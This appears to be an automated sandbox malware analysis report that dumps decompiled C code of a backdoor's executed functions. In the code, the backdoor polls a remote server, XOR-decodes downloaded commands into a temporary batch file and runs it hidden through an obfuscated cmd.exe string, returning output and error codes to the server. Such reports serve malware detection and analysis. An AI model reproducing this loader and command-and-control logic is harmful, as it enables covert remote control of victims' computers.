10098->10162 10154 123daf0 10099->10154 10104 1236fad __dosmaperr 20 API calls 10102->10104 10102->10113 10103->10102 10108 123dea4 10103->10108 10103->10113 10107 123deed 10104->10107 10105->10102 10147 123da02 10105->10147 10110 1236f9a __dosmaperr 20 API calls 10107->10110 10111 123deab 10108->10111 10112 123debf 10108->10112 10110->10113 10114 1236fad __dosmaperr 20 API calls 10111->10114 10169 1236f77 10112->10169 10113->10072 10116 123deb0 10114->10116 10117 1236f9a __dosmaperr 20 API calls 10116->10117 10117->10113 10205 12398a6 RtlLeaveCriticalSection 10118->10205 10120 123dce5 10120->10057 10174 123df14 10121->10174 10196 123ca16 10124->10196 10126 123d8bd 10127 123d8c2 10126->10127 10128 12369c2 _abort 38 API calls 10126->10128 10127->10087 10127->10088 10129 123d8e5 10128->10129 10129->10127 10130 123d903 GetConsoleMode 10129->10130 10130->10127 10134 123d89a 10131->10134 10135 123d865 10131->10135 10132 123d89c GetLastError 10132->10134 10133 123f1b4 WriteConsoleW CreateFileW 10133->10135 10134->10103 10135->10132 10135->10133 10135->10134 10141 123d802 10136->10141 10145 123d6f0 10136->10145 10137 1232550 _ValidateLocalCookies 5 API calls 10138 123d83c 10137->10138 10138->10103 10139 123830b 38 API calls 10139->10145 10140 123d776 WideCharToMultiByte 10140->10141 10142 123d79c WriteFile 10140->10142 10141->10137 10144 123d825 GetLastError 10142->10144 10142->10145 10143 1237101 40 API calls __fassign 10143->10145 10144->10141 10145->10139 10145->10140 10145->10141 10145->10143 10146 123d7cd WriteFile 10145->10146 10146->10144 10146->10145 10148 123da11 10147->10148 10149 123dad3 10148->10149 10151 123da8f WriteFile 10148->10151 10150 1232550 _ValidateLocalCookies 5 API calls 10149->10150 10153 123daec 10150->10153 10151->10148 10152 123dad5 GetLastError 10151->10152 10152->10149 10153->10103 10157 123daff 10154->10157 10155 123dc0a 10156 1232550 _ValidateLocalCookies 5 API calls 10155->10156 10158 123dc19 10156->10158 10157->10155 10159 123db81 WideCharToMultiByte 10157->10159 10161 123dbb6 WriteFile 10157->10161 10158->10103 10160 123dc02 GetLastError 10159->10160 10159->10161 10160->10155 10161->10157 10161->10160 10166 123d932 10162->10166 10163 123d9e5 10165 1232550 _ValidateLocalCookies 5 API calls 10163->10165 10164 123d9a4 WriteFile 10164->10166 10167 123d9e7 GetLastError 10164->10167 10168 123d9fe 10165->10168 10166->10163 10166->10164 10167->10163 10168->10103 10170 1236f9a __dosmaperr 20 API calls 10169->10170 10171 1236f82 __dosmaperr 10170->10171 10172 1236fad __dosmaperr 20 API calls 10171->10172 10173 1236f95 10172->10173 10173->10113 10183 123995a 10174->10183 10176 123df26 10177 123df3f SetFilePointerEx 10176->10177 10178 123df2e 10176->10178 10180 123df57 GetLastError 10177->10180 10181 123df33 10177->10181 10179 1236fad __dosmaperr 20 API calls 10178->10179 10179->10181 10182 1236f77 __dosmaperr 20 API calls 10180->10182 10181->10078 10182->10181 10184 1239967 10183->10184 10185 123997c 10183->10185 10186 1236f9a __dosmaperr 20 API calls 10184->10186 10188 1236f9a __dosmaperr 20 API calls 10185->10188 10190 12399a1 10185->10190 10187 123996c 10186->10187 10189 1236fad __dosmaperr 20 API calls 10187->10189 10191 12399ac 10188->10191 10193 1239974 10189->10193 10190->10176 10192 1236fad __dosmaperr 20 API calls 10191->10192 10194 12399b4 10192->10194 10193->10176 10195 1236cdb _abort 26 API calls 10194->10195 10195->10193 10197 123ca23 10196->10197 10198 123ca30 10196->10198 10199 1236fad __dosmaperr 20 API calls 10197->10199 10200 123ca3c 10198->10200 10201 1236fad __dosmaperr 20 API calls 10198->10201 10202 123ca28 10199->10202 10200->10126 10203 123ca5d 10201->10203 10202->10126 10204 1236cdb _abort 26 API calls 10203->10204 10204->10202 10205->10120 10209 123f1f9 10206->10209 10208 123f29f 10208->10035 10210 123f205 _abort 10209->10210 10220 1239883 RtlEnterCriticalSection 10210->10220 10212 123f213 10213 123f245 10212->10213 10214 123f23a 10212->10214 10216 1236fad __dosmaperr 20 API calls 10213->10216 10221 123f322 10214->10221 10217 123f240 10216->10217 10236 123f26f 10217->10236 10219 123f262 _abort 10219->10208 10220->10212 10222 123995a 26 API calls 10221->10222 10224 123f332 10222->10224 10223 123f338 10239 12398c9 10223->10239 10224->10223 10226 123995a 26 API calls 10224->10226 10235 123f36a 10224->10235 10229 123f361 10226->10229 10227 123995a 26 API calls 10230 123f376 CloseHandle 10227->10230 10231 123995a 26 API calls 10229->10231 10230->10223 10232 123f382 GetLastError 10230->10232 10231->10235 10232->10223 10233 1236f77 __dosmaperr 20 API calls 10234 123f3b2 10233->10234 10234->10217 10235->10223 10235->10227 10248 12398a6 RtlLeaveCriticalSection 10236->10248 10238 123f279 10238->10219 10240 12398d8 10239->10240 10241 123993f 10239->10241 10240->10241 10247 1239902 10240->10247 10242 1236fad __dosmaperr 20 API calls 10241->10242 10243 1239944 10242->10243 10244 1236f9a __dosmaperr 20 API calls 10243->10244 10245 123992f 10244->10245 10245->10233 10245->10234 10246 1239929 SetStdHandle 10246->10245 10247->10245 10247->10246 10248->10238 10249->10009 10250->9989 10251 123d094 10252 1238d8b 51 API calls 10251->10252 10253 123d099 10252->10253 9594 123841b 9595 1238441 9594->9595 9596 123842b 9594->9596 9604 123858c 9595->9604 9607 12384ab 9595->9607 9613 12385ab 9595->9613 9597 1236fad __dosmaperr 20 API calls 9596->9597 9598 1238430 9597->9598 9600 1236cdb _abort 26 API calls 9598->9600 9599 12357d3 20 API calls 9606 1238510 9599->9606 9608 123843a 9600->9608 9602 1238519 9603 12364ce ___vcrt_freefls@4 20 API calls 9602->9603 9603->9604 9633 12387c5 9604->9633 9606->9602 9610 123859e 9606->9610 9624 123cf9b 9606->9624 9607->9599 9611 1236ceb _abort 11 API calls 9610->9611 9612 12385aa 9611->9612 9614 12385b7 9613->9614 9614->9614 9615 12365f3 _abort 20 API calls 9614->9615 9616 12385e5 9615->9616 9617 123cf9b 26 API calls 9616->9617 9618 1238611 9617->9618 9619 1236ceb _abort 11 API calls 9618->9619 9620 1238640 ___scrt_get_show_window_mode 9619->9620 9621 12386e1 FindFirstFileExA 9620->9621 9622 1238730 9621->9622 9623 12385ab 26 API calls 9622->9623 9626 123ceea 9624->9626 9625 123ceff 9627 1236fad __dosmaperr 20 API calls 9625->9627 9628 123cf04 9625->9628 9626->9625 9626->9628 9631 123cf3b 9626->9631 9629 123cf2a 9627->9629 9628->9606 9630 1236cdb _abort 26 API calls 9629->9630 9630->9628 9631->9628 9632 1236fad __dosmaperr 20 API calls 9631->9632 9632->9629 9634 12387cf 9633->9634 9635 12387df 9634->9635 9636 12364ce ___vcrt_freefls@4 20 API calls 9634->9636 9637 12364ce ___vcrt_freefls@4 20 API calls 9635->9637 9636->9634 9638 12387e6 9637->9638 9638->9608 10254 1236398 10255 12363a7 10254->10255 10259 12363bb 10254->10259 10257 12364ce ___vcrt_freefls@4 20 API calls 10255->10257 10255->10259 10256 12364ce ___vcrt_freefls@4 20 API calls 10258 12363cd 10256->10258 10257->10259 10260 12364ce ___vcrt_freefls@4 20 API calls 10258->10260 10259->10256 10261 12363e0 10260->10261 10262 12364ce ___vcrt_freefls@4 20 API calls 10261->10262 10263 12363f1 10262->10263 10264 12364ce ___vcrt_freefls@4 20 API calls 10263->10264 10265 1236402 10264->10265 10357 12382df 10360 12382e4 10357->10360 10359 1238307 10360->10359 10361 12397b6 10360->10361 10362 12397c3 10361->10362 10363 12397e5 10361->10363 10364 12397d1 RtlDeleteCriticalSection 10362->10364 10365 12397df 10362->10365 10363->10360 10364->10364 10364->10365 10366 12364ce ___vcrt_freefls@4 20 API calls 10365->10366 10366->10363 9639 1233a1e 9640 1233a35 9639->9640 9641 1233a28 9639->9641 9641->9640 9642 12364ce ___vcrt_freefls@4 20 API calls 9641->9642 9642->9640 9818 123ff5e 9819 123ff74 9818->9819 9820 123ff68 9818->9820 9820->9819 9821 123ff6d CloseHandle 9820->9821 9821->9819 9822 123275d 9823 1235c9f _abort GetModuleHandleW 9822->9823 9824 1232765 9823->9824 9825 1232771 9824->9825 9826 1235d7a _abort 28 API calls 9824->9826 9828 123277c _abort 9825->9828 9829 1235d5c 9825->9829 9826->9825 9830 1235b45 _abort 28 API calls 9829->9830 9831 1235d67 9830->9831 9831->9828

        Executed Functions

        Function 01232240, Relevance: 47.5, APIs: 17, Strings: 10, Instructions: 203sleepfileprocessCOMMON
        Download Yara Rule

        Control-flow Graph

        C-Code - Quality: 85%
        			E01232240() {
				signed int _v8;
				char _v268;
				char _v528;
				char _v1552;
				long _v1556;
				char _v1560;
				struct _PROCESS_INFORMATION _v1576;
				struct _STARTUPINFOA _v1644;
				signed int _t38;
				int _t54;
				int _t58;
				int _t60;
				int _t73;
				int _t85;
				char* _t86;
				intOrPtr _t88;
				char _t89;
				void* _t92;
				void* _t94;
				int _t97;
				intOrPtr* _t99;
				intOrPtr* _t101;
				intOrPtr* _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t110;
				signed int _t111;
				void* _t112;
				void* _t113;

				_t38 =  *0x1249004; // 0x5a4607f2
				_v8 = _t38 ^ _t111;
				_push(_t104);
				E012333D0(_t104,  &_v268, 0, 0x104);
				E012333D0(_t104,  &_v528, 0, 0x104);
				_t113 = _t112 + 0x18;
				E012315C0("http://poem.ekosa.org/intro/info/info.asp", "http://poem.ekosa.org/intro/info/info.asp");
				GetTempPathA(0x104,  &_v528); // executed
				E01231EB0(); // executed
				_t88 =  *0x124203c;
				_t105 =  *0x1242014;
				asm("o16 nop [eax+eax]");
				while(1) {
					GetTempFileNameA( &_v528, "TMP", 0, "C:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DC.tmp"); // executed
					GetTempFileNameA( &_v528, "TMP", 0, "C:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DD.tmp.bat"); // executed
					if(E01231720("C:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DD.tmp.bat",  &_v1560) < 0) {
						goto L11;
					}
					L2:
					_t98 = _v1560;
					_t86 = _t98 + "C:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DD.tmp.bat";
					_t97 = 0x104 - _t98;
					if(0x104 == 0) {
						L9:
						_t86 = _t86 - 1;
						L10:
						_t88 =  *0x124203c;
						 *_t86 = 0;
						goto L11;
					}
					_t98 = _t98 + 0x7fffffff;
					_t110 = ".bat" - _t86;
					while(_t98 != 0) {
						_t89 =  *((intOrPtr*)(_t110 + _t86));
						if(_t89 == 0) {
							break;
						}
						 *_t86 = _t89;
						_t98 = _t98 - 1;
						_t86 = _t86 + 1;
						_t97 = _t97 - 1;
						if(_t97 != 0) {
							continue;
						}
						goto L9;
					}
					__eflags = _t97;
					if(__eflags != 0) {
						goto L10;
					}
					goto L9;
					L11:
					if( *0x124a4d4 <= 0) {
						_t54 = E01231780(_t88, _t98, _t105, __eflags); // executed
						__eflags = _t54;
						if(_t54 == 0) {
							E012316A0( &_v268, 0x104, "DFE:%08x", GetLastError());
							_t99 =  &_v268;
							_t113 = _t113 + 0x10;
							_t92 = _t99 + 1;
							do {
								_t58 =  *_t99;
								_t99 = _t99 + 1;
								__eflags = _t58;
							} while (_t58 != 0);
							__eflags = _t99 - _t92;
							E01231A90( &_v268, _t99 - _t92); // executed
							_t101 =  &_v268;
							_t94 = _t101 + 1;
							do {
								_t60 =  *_t101;
								_t101 = _t101 + 1;
								__eflags = _t60;
							} while (_t60 != 0);
							L24:
							_t98 = _t101 - _t94;
							E01231A90( &_v268, _t101 - _t94); // executed
							Sleep(0x2bf20); // executed
							while(1) {
								GetTempFileNameA( &_v528, "TMP", 0, "C:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DC.tmp"); // executed
								GetTempFileNameA( &_v528, "TMP", 0, "C:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DD.tmp.bat"); // executed
								if(E01231720("C:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DD.tmp.bat",  &_v1560) < 0) {
									goto L11;
								}
								goto L2;
							}
						}
						L14:
						__eflags =  *0x124a4d4;
						if( *0x124a4d4 > 0) {
							continue;
							do {
								while(1) {
									GetTempFileNameA( &_v528, "TMP", 0, "C:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DC.tmp"); // executed
									GetTempFileNameA( &_v528, "TMP", 0, "C:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DD.tmp.bat"); // executed
									if(E01231720("C:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DD.tmp.bat",  &_v1560) < 0) {
										goto L11;
									}
									goto L2;
								}
								goto L14;
							} while ( *0x124a4d4 > 0);
						}
						_v1644.cb = 0x44;
						E012333D0(_t105,  &(_v1644.lpReserved), 0, 0x40);
						asm("xorps xmm0, xmm0");
						asm("movups [ebp-0x624], xmm0");
						E012333D0(_t105,  &_v1552, 0, 0x400);
						_v1556 = 0;
						_v1644.dwFlags = 1;
						_v1644.wShowWindow = 0;
						DeleteFileA("C:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DC.tmp");
						_push("C:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DC.tmp");
						_push("C:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DD.tmp.bat");
						_push(" /");
						_push("ex");
						E012316A0( &_v1552, 0x400, "%sd.%se%sc %s > %s 2>&1", "cm");
						_t113 = _t113 + 0x38;
						_t73 = CreateProcessA(0,  &_v1552, 0, 0, 0, 0x8000000, 0, 0,  &_v1644,  &_v1576);
						__eflags = _t73;
						if(_t73 != 0) {
							WaitForSingleObject(_v1576.hProcess, 0x493e0);
							Sleep(0x64);
							GetExitCodeProcess(_v1576.hProcess,  &_v1556);
							TerminateProcess(_v1576.hProcess, _v1556);
							CloseHandle(_v1576);
							CloseHandle(_v1576.hThread);
							DeleteFileA("C:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DD.tmp.bat");
							E01231C20(_t88);
							Sleep(0x2bf20);
							continue;
						}
						E012316A0( &_v268, 0x104, "CPE:%08x", GetLastError());
						_t103 =  &_v268;
						_t113 = _t113 + 0x10;
						_t94 = _t103 + 1;
						do {
							_t85 =  *_t103;
							_t103 = _t103 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						goto L24;
					}
					Sleep(0xea60);
					 *0x124a4d4 =  *0x124a4d4 - 1;
				}
			}
































        0x01232249
        0x01232250
        0x01232255
        0x01232264
        0x01232277
        0x0123227c
        0x01232289
        0x0123229a
        0x012322a0
        0x012322a5
        0x012322ab
        0x012322b7
        0x012322c0
        0x012322d3
        0x012322e8
        0x012322fd
        0x00000000
        0x00000000
        0x012322ff
        0x012322ff
        0x0123230a
        0x01232310
        0x01232312
        0x0123233d
        0x0123233d
        0x0123233e
        0x0123233e
        0x0123234a
        0x00000000
        0x0123234a
        0x0123231f
        0x01232321
        0x01232323
        0x01232327
        0x0123232c
        0x00000000
        0x00000000
        0x0123232e
        0x01232330
        0x01232331
        0x01232332
        0x01232335
        0x00000000
        0x00000000
        0x00000000
        0x01232337
        0x01232339
        0x0123233b
        0x00000000
        0x00000000
        0x00000000
        0x0123234d
        0x01232354
        0x01232368
        0x0123236d
        0x0123236f
        0x012324fe
        0x01232503
        0x01232509
        0x0123250c
        0x01232510
        0x01232510
        0x01232512
        0x01232513
        0x01232513
        0x01232517
        0x0123251f
        0x01232524
        0x0123252a
        0x01232530
        0x01232530
        0x01232532
        0x01232533
        0x01232533
        0x01232537
        0x01232537
        0x0123253f
        0x01232549
        0x012322c0
        0x012322d3
        0x012322e8
        0x012322fd
        0x00000000
        0x00000000
        0x00000000
        0x012322fd
        0x012322c0
        0x01232375
        0x01232375
        0x0123237c
        0x00000000
        0x012322c0
        0x012322c0
        0x012322d3
        0x012322e8
        0x012322fd
        0x00000000
        0x00000000
        0x00000000
        0x012322fd
        0x00000000
        0x012322c0
        0x012322c0
        0x0123238a
        0x01232397
        0x012323a7
        0x012323ad
        0x012323b4
        0x012323bc
        0x012323c8
        0x012323d2
        0x012323de
        0x012323e4
        0x012323e9
        0x012323ee
        0x012323f3
        0x0123240e
        0x01232413
        0x0123243c
        0x01232442
        0x01232444
        0x01232487
        0x0123248f
        0x0123249e
        0x012324b0
        0x012324bc
        0x012324c8
        0x012324d3
        0x012324d9
        0x012324e3
        0x00000000
        0x012324e3
        0x0123245a
        0x0123245f
        0x01232465
        0x01232468
        0x01232470
        0x01232470
        0x01232472
        0x01232473
        0x01232473
        0x00000000
        0x01232477
        0x0123235b
        0x0123235d
        0x0123235d

        APIs
        • GetTempPathA.KERNELBASE(00000104,?), ref: 0123229A
          • Part of subcall function 01231EB0: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 01231EE6
          • Part of subcall function 01231EB0: GetProcAddress.KERNEL32(00000000,?), ref: 01231FAB
          • Part of subcall function 01231EB0: LoadLibraryA.KERNELBASE(wininet.dll), ref: 01231FBF
        • GetTempFileNameA.KERNELBASE(?,TMP,00000000,C:\Users\user\AppData\Local\Temp\TMPE5DC.tmp), ref: 012322D3
        • GetTempFileNameA.KERNELBASE(?,TMP,00000000,C:\Users\user\AppData\Local\Temp\TMPE5DD.tmp.bat), ref: 012322E8
        • Sleep.KERNEL32(0000EA60,?), ref: 0123235B
        • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\TMPE5DC.tmp,?,?,?,?,?,?), ref: 012323DE
        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0123243C
        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 01232446
        • WaitForSingleObject.KERNEL32(?,000493E0,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 01232487
        • Sleep.KERNEL32(00000064,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0123248F
        • GetExitCodeProcess.KERNEL32(?,00000000), ref: 0123249E
        • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012324B0
        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012324BC
        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012324C8
        • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\TMPE5DD.tmp.bat,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012324D3
        • Sleep.KERNEL32(0002BF20,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 012324E3
        • GetLastError.KERNEL32(?), ref: 012324EA
        • Sleep.KERNELBASE(0002BF20), ref: 01232549
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: FileSleep$ProcessTemp$CloseDeleteErrorHandleLastLibraryLoadName$AddressCodeCreateExitObjectPathProcSingleTerminateWait
        • String ID: %sd.%se%sc %s > %s 2>&1$.bat$C:\Users\user\AppData\Local\Temp\TMPE5DC.tmp$C:\Users\user\AppData\Local\Temp\TMPE5DD.tmp.bat$CPE:%08x$D$DFE:%08x$TMP$http://poem.ekosa.org/intro/info/info.asp$http://poem.ekosa.org/intro/info/info.asp
        • API String ID: 2697304587-3788188242
        • Opcode ID: 060d9bf43e8431659b6ce160081e6adaaa25c6c974257946f472488fa93942f1
        • Instruction ID: 2cb9136d35722be0fb5177df4918bce4d17e4b63101a4d474c455631b065348e
        • Opcode Fuzzy Hash: 060d9bf43e8431659b6ce160081e6adaaa25c6c974257946f472488fa93942f1
        • Instruction Fuzzy Hash: 7A7116B5AA0219EBEB34DB64EC49FE877B9AF94700F0040D5F745A7181DBB16A94CF20
        Uniqueness

        Uniqueness Score: -1.00%

        Function 01231780, Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 265filenetworkCOMMONCrypto
        Download Yara Rule

        Control-flow Graph

        C-Code - Quality: 57%
        			E01231780(void* __ebx, void* __edx, void* __edi, void* __eflags) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v788;
				long _v792;
				long _v796;
				void* __esi;
				void* __ebp;
				signed int _t36;
				struct _SECURITY_ATTRIBUTES* _t55;
				signed int _t97;
				void* _t98;
				long _t110;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t116;
				void* _t124;
				void* _t135;
				void* _t138;
				void* _t139;
				void* _t140;
				long _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;
				intOrPtr _t147;
				void* _t148;
				signed int _t149;

				_t138 = __edi;
				_t135 = __edx;
				_t36 =  *0x1249004; // 0x5a4607f2
				_v8 = _t36 ^ _t149;
				E012333D0(__edi,  &_v528, 0, 0x104);
				E012333D0(_t138,  &_v788, 0, 0x104);
				E012333D0(_t138,  &_v268, 0, 0x104);
				GetTempPathA(0x104,  &_v788);
				GetTempFileNameA( &_v788, "TMP", 0,  &_v268); // executed
				_t147 =  *0x1242028;
				DeleteFileA("C:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DD.tmp.bat"); // executed
				E012315C0( &_v528, "http://poem.ekosa.org/intro/info/info.asp");
				E01231620( &_v528, "?id=dn678");
				DeleteUrlCacheEntry( &_v528); // executed
				_push(0);
				_push(0);
				_push( &_v268);
				_t55 =  &_v528;
				_push(_t55);
				_push(0); // executed
				"`\\lmC:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DD.tmp.bat"(); // executed
				if(_t55 != 0) {
					return E01232550(__ebx, _v8 ^ _t149, _t135, _t138, _t147);
				} else {
					_push(_t138);
					_v796 = _t55;
					_t139 = CreateFileA( &_v268, 0x80000000, 1, _t55, 3, 0x80, _t55);
					if(_t139 != 0xffffffff) {
						_push(__ebx);
						_t110 = GetFileSize(_t139, 0);
						if(_t110 != 0) {
							_t18 = _t110 + 0x20; // 0x20
							_t148 = LocalAlloc(0x40, _t18);
							if(_t148 == 0) {
								L8:
								CloseHandle(_t139);
								 *((intOrPtr*)( *0x1242028))( &_v268);
								_pop(_t111);
								_pop(_t140);
								return E01232550(_t111, _v8 ^ _t149, _t135, _t140, _t148);
							} else {
								if(ReadFile(_t139, _t148, _t110,  &_v796, 0) != 0) {
									CloseHandle(_t139);
									 *((intOrPtr*)( *0x1242028))( &_v268);
									_t136 =  &_v792;
									_v792 = _t110;
									E01231260(_t148,  &_v792, _t139);
									_t141 = _v792;
									_t124 = 0;
									if(_t141 > 0) {
										if(_t141 >= 0x20) {
											_t97 = _t141 & 0x8000001f;
											if(_t97 < 0) {
												_t97 = (_t97 - 0x00000001 | 0xffffffe0) + 1;
											}
											asm("movaps xmm1, [0x12477a0]");
											_t136 = _t141 - _t97;
											_t26 = _t148 + 0x10; // 0x10
											_t98 = _t26;
											do {
												asm("movups xmm0, [eax-0x10]");
												_t124 = _t124 + 0x20;
												_t98 = _t98 + 0x20;
												asm("pxor xmm0, xmm1");
												asm("movups [eax-0x30], xmm0");
												asm("movups xmm0, [eax-0x20]");
												asm("pxor xmm0, xmm1");
												asm("movups [eax-0x20], xmm0");
											} while (_t124 < _t136);
										}
										while(_t124 < _t141) {
											 *(_t124 + _t148) =  *(_t124 + _t148) ^ 0x0000009e;
											_t124 = _t124 + 1;
										}
									}
									if(_t141 != 0xa || E01233C90(_t148, "sleep", 5) != 0) {
										_t112 = CreateFileA("C:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DD.tmp.bat", 0x40000000, 2, 0, 2, 0x80, 0);
										if(_t112 != 0xffffffff) {
											if(WriteFile(_t112, _t148, _t141,  &_v796, 0) != 0) {
												 *((intOrPtr*)( *0x124202c))(_t112);
												goto L21;
											} else {
												LocalFree(_t148);
												 *((intOrPtr*)( *0x124202c))();
												DeleteFileA("C:\\Users\\jones\\AppData\\Local\\Temp\\TMPE5DD.tmp.bat");
												_t114 = _t112;
												_pop(_t143);
												return E01232550(_t114, _v8 ^ _t149, _t136, _t143, _t148);
											}
										} else {
											LocalFree(_t148);
											_pop(_t115);
											_pop(_t144);
											return E01232550(_t115, _v8 ^ _t149, _t136, _t144, _t148);
										}
									} else {
										_t30 = _t148 + 5; // 0x5
										 *0x124a4d4 = E012352FD(_t124, _t30);
										L21:
										LocalFree(_t148);
										_pop(_t113);
										_pop(_t142);
										return E01232550(_t113, _v8 ^ _t149, _t136, _t142, _t148);
									}
								} else {
									LocalFree(_t148);
									goto L8;
								}
							}
						} else {
							CloseHandle(_t139);
							DeleteFileA( &_v268);
							_pop(_t116);
							_pop(_t145);
							return E01232550(_t116, _v8 ^ _t149, _t135, _t145, _t147);
						}
					} else {
						_pop(_t146);
						return E01232550(__ebx, _v8 ^ _t149, _t135, _t146, _t147);
					}
				}
			}




































        0x01231780
        0x01231780
        0x01231789
        0x01231790
        0x012317a2
        0x012317b5
        0x012317c8
        0x012317dc
        0x012317f7
        0x012317fd
        0x01231808
        0x01231815
        0x01231825
        0x01231831
        0x01231837
        0x01231839
        0x01231841
        0x01231842
        0x01231848
        0x01231849
        0x0123184b
        0x01231853
        0x01231a8e
        0x01231859
        0x01231859
        0x01231865
        0x0123187d
        0x01231882
        0x01231896
        0x012318a0
        0x012318a4
        0x012318c9
        0x012318d5
        0x012318d9
        0x012318f8
        0x012318f9
        0x0123190b
        0x0123190d
        0x0123190e
        0x0123191f
        0x012318db
        0x012318ef
        0x01231921
        0x01231933
        0x01231935
        0x0123193b
        0x01231943
        0x01231948
        0x0123194e
        0x01231952
        0x01231957
        0x0123195b
        0x01231960
        0x01231966
        0x01231966
        0x01231967
        0x01231970
        0x01231972
        0x01231972
        0x01231975
        0x01231975
        0x01231979
        0x0123197c
        0x0123197f
        0x01231983
        0x01231987
        0x0123198b
        0x0123198f
        0x01231993
        0x01231975
        0x01231999
        0x012319a0
        0x012319a4
        0x012319a5
        0x01231999
        0x012319ac
        0x01231a0d
        0x01231a12
        0x01231a42
        0x01231a77
        0x00000000
        0x01231a44
        0x01231a45
        0x01231a51
        0x01231a58
        0x01231a5e
        0x01231a5f
        0x01231a70
        0x01231a70
        0x01231a14
        0x01231a15
        0x01231a1b
        0x01231a1c
        0x01231a2d
        0x01231a2d
        0x012319c2
        0x012319c2
        0x012319ce
        0x012319d3
        0x012319d4
        0x012319da
        0x012319db
        0x012319ef
        0x012319ef
        0x012318f1
        0x012318f2
        0x00000000
        0x012318f2
        0x012318ef
        0x012318a6
        0x012318a7
        0x012318b4
        0x012318b6
        0x012318b7
        0x012318c8
        0x012318c8
        0x01231884
        0x01231884
        0x01231895
        0x01231895
        0x01231882

        APIs
        • GetTempPathA.KERNEL32(00000104,?), ref: 012317DC
        • GetTempFileNameA.KERNELBASE(?,TMP,00000000,?), ref: 012317F7
        • DeleteFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\TMPE5DD.tmp.bat), ref: 01231808
        • DeleteUrlCacheEntry.WININET(?), ref: 01231831
        • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0123184B
        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01231877
        • GetFileSize.KERNEL32(00000000,00000000), ref: 0123189A
        • CloseHandle.KERNEL32(00000000), ref: 012318A7
        • DeleteFileA.KERNEL32(?), ref: 012318B4
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.1002474836.0000000001231000.00000040.00020000.sdmp, Offset: 01230000, based on PE: true
        • Associated: 00000000.00000002.1002466607.0000000001230000.00000002.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002492548.0000000001249000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002502352.000000000124D000.00000040.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002507213.000000000124E000.00000080.00020000.sdmp Download File
        • Associated: 00000000.00000002.1002512222.0000000001250000.00000004.00020000.sdmp Download File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1230000_WVbU1Gf5p8.jbxd
        Similarity
        • API ID: File$Delete$Temp$CacheCloseCreateDownloadEntryHandleNamePathSize
        • String ID: ?id=dn678$C:\Users\user\AppData\Local\Temp\TMPE5DD.tmp.bat$TMP$http://poem.ekosa.org/intro/info/info.asp$sleep
        • API String ID: 4183970249-747994356
        • Opcode ID: c3800ba8663e57e8029c07db2f03b678cb02476ca8080e65ca6fb35b59f32e4a
        • Instruction ID: 5cb96ac1abef7569b328e0a6e1b1dcb8e92b857fa49d368953eb821cb7a4c8c3
        • Opcode Fuzzy Hash: c3800ba8663e57e8029c07db2f03b678cb02476ca8080e65ca6fb35b59f32e4a
        • Instruction Fuzzy Hash: 7C81D775A10219ABD721DB78FC49FFE73BDEF98710F100196F60AD6181EB709A858B60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 01231EB0, Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 271libraryloaderCOMMONCrypto
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
